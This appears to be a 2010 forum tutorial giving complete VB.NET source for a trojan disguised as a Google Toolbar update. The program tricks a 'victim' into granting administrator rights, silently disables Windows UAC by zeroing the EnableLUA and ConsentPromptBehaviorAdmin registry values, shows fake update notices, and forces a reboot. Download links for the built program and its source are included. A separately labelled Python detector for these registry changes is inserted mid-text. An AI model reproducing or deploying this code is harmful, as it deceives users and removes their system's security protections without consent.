Kulverstukas

tutorial

Aug 5th, 2010
(Guess the preview function is broken o.O so expect edits for a while ^^)

Hello everyone, today I will show you a basic way to kill Windows 7 / Vista's UAC control.

To do this we are going to rely on two things:

1.) The victim's natural ability to trust known applications (Social Engineering)
2.) Basic knowledge of vb.net to keep the program fully undetected.
----------------------------------------------------------------------------------------------

To start off we will need to create a new Project.

http://img408.imageshack.us/img408/770/12679432.png

You can of course name it whatever you want, but for the tutorial's sake I named it UAC Bypass. (Even though it is actually a killer hehe)

Next up we need to add a few controls to our form. I will have the application run hidden while displaying messages to the user through a timed delay. Along with those messages I will add a friendly looking notification icon within the user's tray to give them an update on, well.. the update.

To do the above I am going to add two controls: a Timer and a Notification Icon.

To add a new control to your form, look at your toolbox on the left side of the screen and drag/drop the control onto your form. Once you get the two controls added your form should look something like this:

http://img691.imageshack.us/img691/5348/49452042.png

Once you have the two controls added to your application, head over to its properties (on the right side of the screen, opposite the toolbox) and change the following settings:

Opacity: 0%
Show Icon: False
Show In Taskbar: False
Windows State: Minimized

http://img156.imageshack.us/img156/4336/70893126.png

After that we head into our project's properties

http://img192.imageshack.us/img192/3628/23083517.png

And change the Assembly name and the Root namespace to make it seem more trustworthy. (You can have these set to something more trustworthy by default when you create the application: if you created the application with the name "GoogleTBupdate" then those two fields would already say what we are about to make them say.)

Assembly Name: GoogleTBupdate
Root Namespace: GoogleTBupdate

http://img171.imageshack.us/img171/4841/57173400.png

Next up we head over into our Assembly information and change it accordingly:
http://img375.imageshack.us/img375/5958/26463599.png

Click OK and then move on into UAC Settings and change the following line of code:

Change:
    <requestedExecutionLevel level="asInvoker" uiAccess="false" />
To:
    <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

This will force the application to execute with administrative access, helping us out later on. Now you may be wondering "Why would the user run this as admin?" It is simple: when we changed our assembly information we changed what it says on the "Requesting Administrative Control" prompt, so it will now ask if GoogleTBupdate can have administrative control. Because of this people will be more willing to allow it to run.

Congrats! You completed step one. Now that your application is set up we can begin programming!

==To get into the coding console just double click on your form.==

We will start off by importing Microsoft.Win32. To do that we will add the following line of code to the very top of the console (above Public Class Form1):

    Imports Microsoft.Win32

From here we should see this in our console:

    Imports Microsoft.Win32

    Public Class Form1
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

        End Sub
    End Class

Now, Vista users do not have to restart in order to have their UAC settings saved; however, Windows 7 users do. Considering this, we will need to program a way for the application to identify the current operating system and take the necessary actions. To do this we will declare a variable and give it the value containing the name of their OS. We do this through the Dim command as seen below:

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Dim OS As String
        OS = My.Computer.Info.OSFullName
    End Sub

What the above basically said was that we created a new variable with the name OS and that OS was equal to the current computer's full operating system name.

Next we need to tell the program what to do if the OS is running Vista or Win. 7. We will do this using an If/Then statement. I will explain the following code in detail below:

    Public Class Form1
        Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Dim OS As String
            OS = My.Computer.Info.OSFullName
            If OS.Contains("Vista") = False Then
                ' Not Vista: only show the balloon and start the timer;
                ' the registry change is left to the timer handler.
                NotifyIcon1.Visible = True
                NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
                NotifyIcon1.BalloonTipText = "Downloading and Installing the Latest Build of Google ToolBar..."
                NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
                NotifyIcon1.ShowBalloonTip(10000)
                Timer1.Interval = 30000
                Timer1.Start()
            Else
                ' Vista: write the two UAC policy values straight away.
                Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
                UAC.SetValue("EnableLUA", 0)
                Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
                UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)
                NotifyIcon1.Visible = True
                NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
                NotifyIcon1.BalloonTipText = "Downloading and Installing the Latest Build of Google ToolBar..."
                NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
                NotifyIcon1.ShowBalloonTip(10000)
                Timer1.Interval = 30000
                Timer1.Start()
            End If
        End Sub

What the If/Then statement is doing is telling the application "Hey, if they are not running Vista then do this first. But if they are running Vista then do this."

==Windows 7 Portion==

Because Win 7 needs a reboot in order to apply the settings, and the security center notifies the user that the UAC settings have been changed, we need to apply these changes and then reboot as fast as possible, so we will apply these changes at the end.

NotifyIcon1.* calls up the NotifyIcon control and tells it what to do, and is pretty self-explanatory.

Timer1.Interval = 30000 tells the timer control to wait 30000 milliseconds (30 seconds) and then execute its action. At the moment nothing will happen after the 30 seconds are over, but we will change that shortly.

==Windows Vista Portion==

Because Windows Vista does not need to reboot in order to change its settings, and we can disable a user-notified message, we will apply said changes sooner rather than later.

    Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
    UAC.SetValue("EnableLUA", 0)
    Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
    UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)

The above is the heart and soul of the whole application; if this code segment fails then the entire application would have been pointless.

What we are doing is declaring a new variable named UAC that will take on the registry key given.
After that we tell our variable to give the registry entry the given value (in this case we are giving "EnableLUA" the value of 0 (off)).
Then we do the same with the next variable, UACbp, to disable the "Would you like to run this crap as admin?" prompt.

After that we use the same NotifyIcon and timer commands.
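
Added example (not part of the original tutorial or its author's code): a defender-side check for the two registry writes described above, run over constructed events that use Sysmon's field names (Event ID 13 = registry value set, Event ID 1 = process create). The JSON-lines layout, the sample events, the user path and the name find_uac_tampering are assumptions made for illustration.

```python
import json
import re

# Key and value names taken from the tutorial's registry writes.
UAC_KEY = r"\software\microsoft\windows\currentversion\policies\system"
WATCHED = {"enablelua", "consentpromptbehavioradmin"}
DWORD = re.compile(r"DWORD \(0x([0-9a-fA-F]{8})\)")

# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = r'''
{"EventID": 13, "ProcessId": 4120, "Image": "C:\\Users\\bob\\Downloads\\GoogleTBupdate.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", "Details": "DWORD (0x00000000)"}
{"EventID": 13, "ProcessId": 4120, "Image": "C:\\Users\\bob\\Downloads\\GoogleTBupdate.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000000)"}
{"EventID": 13, "ProcessId": 900, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", "Details": "DWORD (0x00000005)"}
{"EventID": 1, "ProcessId": 5300, "ParentProcessId": 4120, "Image": "C:\\Windows\\System32\\shutdown.exe", "CommandLine": "shutdown -r -t 00"}
'''


def find_uac_tampering(raw_events):
    """Return {pid: alert} for processes that set a watched UAC value to 0."""
    alerts = {}
    for line in filter(str.strip, raw_events.splitlines()):
        ev = json.loads(line)
        if ev["EventID"] == 13:
            key, _, name = ev["TargetObject"].lower().rpartition("\\")
            m = DWORD.fullmatch(ev["Details"])
            zeroed = bool(m) and int(m.group(1), 16) == 0
            if key.endswith(UAC_KEY) and name in WATCHED and zeroed:
                alert = alerts.setdefault(
                    ev["ProcessId"],
                    {"image": ev["Image"], "values": [], "forced_reboot": False},
                )
                alert["values"].append(name)
        elif ev["EventID"] == 1 and ev.get("ParentProcessId") in alerts:
            # A reboot spawned by the process that just zeroed the values
            # matches the Windows 7 path in the tutorial; raise severity.
            args = ev["CommandLine"].lower().split()
            is_shutdown = ev["Image"].lower().endswith("\\shutdown.exe")
            if is_shutdown and ("-r" in args or "/r" in args):
                alerts[ev["ParentProcessId"]]["forced_reboot"] = True
    return alerts


if __name__ == "__main__":
    for pid, alert in find_uac_tampering(SAMPLE_EVENTS).items():
        print(pid, alert)
```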

==The Timer==

Now that we have our application doing something when it starts up, we need to tell it to do something when the timer reaches 30 seconds.

I will explain the code in detail below:

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        Dim OS As String
        OS = My.Computer.Info.OSFullName
        If NotifyIcon1.BalloonTipText = "Update Installed!" = False Then
            ' First tick: switch the balloon text and shorten the interval.
            NotifyIcon1.BalloonTipTitle = "Google ToolBar Update"
            NotifyIcon1.BalloonTipText = "Update Installed!"
            NotifyIcon1.BalloonTipIcon = ToolTipIcon.Info
            NotifyIcon1.ShowBalloonTip(5000)
            Timer1.Interval = 10000
        Else
            If OS.Contains("Vista") Then
                End
            Else
                ' Not Vista: write the two UAC policy values, then reboot.
                MsgBox("Google ToolBar will now reboot the system.", MsgBoxStyle.Information, Title:="Google ToolBar Update Notification")
                Dim UAC As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
                UAC.SetValue("EnableLUA", 0)
                Dim UACbp As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True)
                UACbp.SetValue("ConsentPromptBehaviorAdmin", 0)
                System.Diagnostics.Process.Start("shutdown", "-r -t 00")
            End If
        End If
    End Sub

You may recognize the OS string again and you may be wondering why we need to use it again. It is simply because a variable declared with Dim inside a Sub is only visible within that Sub.

On to the first If/Then statement. What it is saying is "If the NotifyIcon does not say that the update is installed then we need to make it say that; if it does then we move on to the next segment of code."

The next If/Then statement says "If the OS contains Vista then we can close the application (End), but if not then we need to apply the registry changes and restart the computer ASAP."

Once we finish coding our timer we are done! Just compile the application and everything should work perfectly; if not then you did something wrong.

Download program set: http://www.multiupload.com/MI2M1V6BRS

Download Source: http://www.multiupload.com/F1KBRB350Z

.:: Tutorial and Method Written and Coded By Kamakzy56 ::.

I do Not give you permission to edit and re-use this tutorial on other forums or websites
I do give you permission to modify the source file any way you want.
I do Not give you permission to say you were the original one to come up with this method.